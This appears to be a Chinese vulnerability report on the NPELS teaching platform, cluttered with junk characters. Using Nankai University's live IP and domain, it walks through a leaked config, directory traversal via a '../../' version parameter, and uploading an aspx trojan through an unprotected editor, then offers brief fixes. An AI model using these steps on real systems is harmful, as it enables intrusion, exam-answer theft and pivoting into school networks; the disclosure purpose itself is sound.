好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
7 L1 }# a1 y* X3 t
/ s' i& B+ g% E5 J详细说明:
; P6 O+ c5 }; @1 u' V
\) o9 d) p {以南开大学的为例: 3 M. ~( p6 q+ O5 Q6 @( p5 K
http://222.30.60.3/NPELS
$ q; `% y _3 q2 K! E, S, `NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址% R' D1 D0 i2 y) A2 }
<setting name="Update_CommonSvr_CommonService" serializeAs="String">5 h% t) j% g$ g, L
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>- h% ^1 }+ _ c1 ^5 P
</setting>8 w5 z) T' i9 G8 w( W+ e
及版本号
0 M" c# c$ E9 o% _/ y<add key="TVersion" value="1, 0, 0, 2187">4 ]5 R0 I0 l# l! g9 T# B
</add>% g/ K& i" j& S5 f: H( D' j) s
直接访问
, Y% K. _5 m- K$ mhttp://222.30.60.3/NPELS/CommonService.asmx
4 K1 D$ m! f: \使用GetTestClientFileList操作,直接 HTTP GET 列目录:
1 M* s; ?2 ?- \/ ]( p5 Bhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
, H/ A, N5 `& k2 Q4 V: U3 k进一步列目录(返回的网页很大,可以直接 wget 下来)
6 F6 o: K1 x. t$ shttp://222.30.60.3/NPELS/CommonS ... List?version=../../
% {; j* V1 l. X* d& X* n2 I / Y8 w4 C( Z3 B7 j9 G
发现* ^( ?5 m+ N, [4 V
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
% J. d/ @" ~, F, A可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头! D4 J$ [7 k- u: k
上传后继续列目录找到木马地址直接访问即可. `! A4 J' b' _ z4 p
# q4 A g. s& m6 V' ]: KOOXX- _" k7 v" O$ h
( C# e0 n/ Z% t0 X8 Z% L# L
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法# p" b8 T ^9 I' x8 d
漏洞证明:
6 o+ F' X9 {9 D5 r/ R C
( v. u8 r: }4 v) R5 n列目录:4 o9 m% Y/ x4 z
http://222.30.60.3/NPELS/CommonS ... List?version=../../3 c- ^. N: P* N4 n7 B# ]! V7 t9 x r
文件上传:
+ ^' p7 O% k t. F X2 W4 Qhttp://222.30.60.3/npelsv/editor/editor.htm/ p% J$ s2 A$ F; D, W( X
- c1 t/ I( {8 ]9 ]
上传木马:
# a' g' c: V$ V& X! ~( u' m+ O1 ~http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx/ g( `/ J- } y2 H+ l% B* f
* F* M- R" a7 Z _+ D9 Z
修复方案:) e1 ~0 i! {# \ F" W0 U C6 F
好像考试系统必须使用 CommonService.asmx6 V( R" U# |9 S+ v( s/ {
最好配置文件加密或者用别的方式不让它泄露出来5 c' _, H9 S8 o
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样2 G r; D! b& C) I; s
|